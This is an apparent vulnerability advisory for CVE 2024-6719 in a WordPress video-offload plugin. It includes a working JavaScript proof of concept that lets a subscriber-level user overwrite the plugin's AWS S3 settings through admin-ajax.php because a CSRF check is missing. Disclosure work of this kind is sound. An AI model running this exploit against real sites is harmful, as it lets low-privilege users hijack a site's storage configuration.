Offload Videos – Bunny.net, AWS S3 <= 1.0.1 Subscriber+ CSRF | CVE 2024-6719

Description

The plugin does not have CSRF check in place when updating its settings, which could allow low privilege users to update them via a CSRF attack

Proof of Concept

Execute the below code in subscriber user is browser console:

```
var url = 'https://example.com/wp-admin/admin-ajax.php';
var params = new URLSearchParams();

params.append('amazon_s3_bucket', 'HackedbySubUser');
params.append('amazon_s3_key', 'test');
params.append('amazon_s3_secret', 'test');
params.append('amazon_s3_region', 'test');
params.append('streaming_connect_service', 'amazon');
params.append('action', 'verify_and_save_api_settings');

fetch(url, {
  method: 'POST',
  headers: {
    'Accept': 'text/plain, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: params,
  credentials: 'include'
})
.then(response => {
  if (!response.ok) {
    throw new Error('Network response was not ok');
  }
  return response.text();
})
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

```